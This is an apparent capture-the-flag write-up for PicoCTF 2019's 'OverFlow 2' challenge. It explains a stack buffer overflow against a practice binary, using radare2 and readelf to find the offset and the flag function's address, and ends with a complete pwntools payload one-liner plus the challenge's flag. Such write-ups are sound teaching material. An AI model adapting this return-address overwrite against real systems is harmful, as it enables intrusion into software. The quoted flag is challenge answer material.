PicoCTF-2019 Writeup
Search
K
Comment on page

OverFlow 2

Problem

Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.

Solution

  1. 1.
    Find the offset/padding
    1. 1.
      You can use the method described in rop64 with the cyclic and cyclic_find or you can use the following
    2. 2.
      Open vuln in radare2 with r2 ./vuln
    3. 3.
      Run aaaa
    4. 4.
      Run pdf @ sym.vuln to get var int local_b8h @ ebp-0xb8
    5. 5.
      The 0xb8 is the buffer location so 4 more bytes are needed to get past the "saved ebp register"
    6. 6.
      So the offset is 0xb8+4
  2. 2.
    Run readelf -s vuln to get the address of flag: 0x080485e6
  3. 3.
    We can use p32 from pwntools to convert the hex addresses to little endian.
  4. 4.
    We need to pad out the second return address with 'a'*4 so that goes next in the payload
  5. 5.
    Now we can add the two function arguments in little endian using p32
  6. 6.
    Payload complete: python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln

Flag

picoCTF{arg5_and_r3turn5ce5cf61a}
Previous
messy-malloc
Next
CanaRy
Last modified 2yr ago